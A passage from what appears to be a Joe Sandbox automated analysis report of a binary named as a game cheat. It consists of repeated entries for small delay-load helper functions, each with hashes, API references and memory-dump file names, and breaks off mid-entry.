                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f0051b507c5a7230f49ed3519840c753f18eca43687cd12cc958b2c90d1b6058
                                                    • Instruction ID: cbe1b954172ce3f03a11f213232e4d9c67205c09e83a07013955f75f7d7d3a28
                                                    • Opcode Fuzzy Hash: f0051b507c5a7230f49ed3519840c753f18eca43687cd12cc958b2c90d1b6058
                                                    • Instruction Fuzzy Hash: 34B012E266C600AC710491262C02E3B034CC0C1B11330C83EFC1DC01C0D850EC080472
                                                    Function 00D0E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1de701c6e733a0b0830711df3429a4b12d95c47cef5f1e2a1d435b507a396899
                                                    • Instruction ID: 20f00aae2f239f02f92b3add9897aef19505e2240346d6171c3ef9595fc691e9
                                                    • Opcode Fuzzy Hash: 1de701c6e733a0b0830711df3429a4b12d95c47cef5f1e2a1d435b507a396899
                                                    • Instruction Fuzzy Hash: 9CB012F266C700BC710491152C02E3B030CC0C1F11330C83EFC1DC01C0D850ED080472
                                                    Function 00D0E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: deb19eb77ae29b628934d25b3ba04c4114284659e74a374427ad2b2966589d16
                                                    • Instruction ID: f24e05030718ad70f7767f59b36e2891c6c1949ab6f518457997a411eea56637
                                                    • Opcode Fuzzy Hash: deb19eb77ae29b628934d25b3ba04c4114284659e74a374427ad2b2966589d16
                                                    • Instruction Fuzzy Hash: F7B092A266C740AC614592152802E3A020CC0C0B11320892ABC1DC02C09850AC480872
                                                    Function 00D0E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 96e2c060502aefba5a29d1bd823060c0181fb7ec0b30a72fbe0c35a3b3b8f128
                                                    • Instruction ID: a3154f1b3a1dc952a783fb1dae998a637392a22ec64b2eec73ecde2022c36566
                                                    • Opcode Fuzzy Hash: 96e2c060502aefba5a29d1bd823060c0181fb7ec0b30a72fbe0c35a3b3b8f128
                                                    • Instruction Fuzzy Hash: A8B012E266C700AC710492152D02E3B030CC0C0B11330C83EFC1DC02C0DC60ED0D0872
                                                    Function 00D0E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 87586e12fd7f30c1722d37c004f46c9818eed5915e035455b5b43479efc376ca
                                                    • Instruction ID: 46c2b590b0b1c785753ae0e9133f501f8ea1b482144be27f7cee80925a56a4cb
                                                    • Opcode Fuzzy Hash: 87586e12fd7f30c1722d37c004f46c9818eed5915e035455b5b43479efc376ca
                                                    • Instruction Fuzzy Hash: 70B012F266C600AC710491152D02E3B030CC0C0F11330883EFC1DC01C0EC50EE090472
                                                    Function 00D0E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 00b2e2423c4521569b3b29be6357185192299ff7195252bef03173df88ffaba2
                                                    • Instruction ID: 18fe19eb70a5e68ba97e0a98b2565ee3d47d57371500fe64c3986e2057f55ea2
                                                    • Opcode Fuzzy Hash: 00b2e2423c4521569b3b29be6357185192299ff7195252bef03173df88ffaba2
                                                    • Instruction Fuzzy Hash: 67B012F266C600AC710491262C02E3B030CC0C0F11330883EFC1DC01C0D850ED080472
                                                    Function 00D0E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25aa66f2079415e8498a8ee323c79040fd589ac7eb84c8040ba3dc543b7ffcfb
                                                    • Instruction ID: 4c9bffbca6093eee3adc887b33b20f81e480295ed3a3be75a8df2cff4e5dca25
                                                    • Opcode Fuzzy Hash: 25aa66f2079415e8498a8ee323c79040fd589ac7eb84c8040ba3dc543b7ffcfb
                                                    • Instruction Fuzzy Hash: F2B012F266C700BC714591152C02E3B030CC0C0F11330893EFC1DC01C0DC50ED480472
                                                    Function 00D0E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1bd98b10a603db7c37e66a64456aae5fd030bbd774e5998e60149613414a4e22
                                                    • Instruction ID: a4c3c173e47f94d29197120a11be5e6ee2601c2a102c177021b5b7cf9c05d651
                                                    • Opcode Fuzzy Hash: 1bd98b10a603db7c37e66a64456aae5fd030bbd774e5998e60149613414a4e22
                                                    • Instruction Fuzzy Hash: 2DB012E2269210BC710491092C02E3B030DC0C1B23330D82EFC1CC11C0D8408C0C0473
                                                    Function 00D0E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 29935ae23e251949aa10768c4d1fbd0fb340d31bf576f09a71059573483c3b19
                                                    • Instruction ID: 1eed0b7c4ab774b532a4575689865d63bc199c804d4e16fd72b842a50e1b74e3
                                                    • Opcode Fuzzy Hash: 29935ae23e251949aa10768c4d1fbd0fb340d31bf576f09a71059573483c3b19
                                                    • Instruction Fuzzy Hash: AAB012E22682107C714451092D02E3B430DC0C1B13330D82EFD1CC11C0D8404C0D0473
                                                    Function 00D0E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 382734549a0be2f1c249e431f7582f215d2b62427562ec04fba6a69ed7183b2d
                                                    • Instruction ID: 56df35c17dd2c99ea2ae6a4779d1652eb7e998db56ef9009459867d9bc7c0a18
                                                    • Opcode Fuzzy Hash: 382734549a0be2f1c249e431f7582f215d2b62427562ec04fba6a69ed7183b2d
                                                    • Instruction Fuzzy Hash: 33B012F2268210BC710491096C02E3B030DC0C1F23330D82EFC1CC11C0D8408E0C0473
                                                    Function 00D0E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f936bd8902d31435c408c5d5783549bc9fce021b3d497983e8491846570d2759
                                                    • Instruction ID: baf07ce0b497f9972122ca47199bc691be137ad8aceb89c30224c74a31fa1ca2
                                                    • Opcode Fuzzy Hash: f936bd8902d31435c408c5d5783549bc9fce021b3d497983e8491846570d2759
                                                    • Instruction Fuzzy Hash: BBB012C226D5207E710852743C0AE3B030DC0C0B163309D2EFC4CC11C0E8404C0C0471
                                                    Function 00D0E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4a7ca635eebd4ee77e12f927aa31dc8aee5a8ba98447f4c795802be2104385d5
                                                    • Instruction ID: f4e00bfac8e17441ae5e45dd82931a02e528082b9e0dd4ea28f0235c274b5db3
                                                    • Opcode Fuzzy Hash: 4a7ca635eebd4ee77e12f927aa31dc8aee5a8ba98447f4c795802be2104385d5
                                                    • Instruction Fuzzy Hash: D1B012C226D6207C714851647C0BE3B031DC0D0B163309F2EFC4CC11C0EC405C4C0471
                                                    Function 00D0E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f59a2af2022f2b3bc81e6624c5f28072c95c9beed00734c99b0dd80d5c3643f9
                                                    • Instruction ID: 4f2152dd692d7b25b5021bb517429a4d5ba086ae312ed6b8e27be252d80b2d6e
                                                    • Opcode Fuzzy Hash: f59a2af2022f2b3bc81e6624c5f28072c95c9beed00734c99b0dd80d5c3643f9
                                                    • Instruction Fuzzy Hash: A3B012C226D5207C750851647D0AE3B031DC0D0B163309F2EFC4CC11C0EC404D1D0471
                                                    Function 00D0E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: f04a8934d79d990259eecc4a83ccbee060bc296fae1efbf763d80d7522aae519
                                                    • Instruction ID: 3314136b4c87352dd02f1dab8e160755a54f57a8a2c27526200ee662a09dcd7b
                                                    • Opcode Fuzzy Hash: f04a8934d79d990259eecc4a83ccbee060bc296fae1efbf763d80d7522aae519
                                                    • Instruction Fuzzy Hash: 16B092822686007C620451086C06E3A0209C0C5B163309A2AB808C11C0A8405C480471
                                                    Function 00D0E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: fc868c8965e30ac039ff4b1e08a6ba4fb631aa4f402643fc890d2532379382ae
                                                    • Instruction ID: 0fd4bb5b2b17c45413186431cd99384d65b4839b9fcf8a35abbb2c41fb5861c2
                                                    • Opcode Fuzzy Hash: fc868c8965e30ac039ff4b1e08a6ba4fb631aa4f402643fc890d2532379382ae
                                                    • Instruction Fuzzy Hash: 35B012C32685007C710411282C0AE3F030DC0C1F163309C3FFC58C14C1A8404D0C0471
                                                    Function 00D0E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
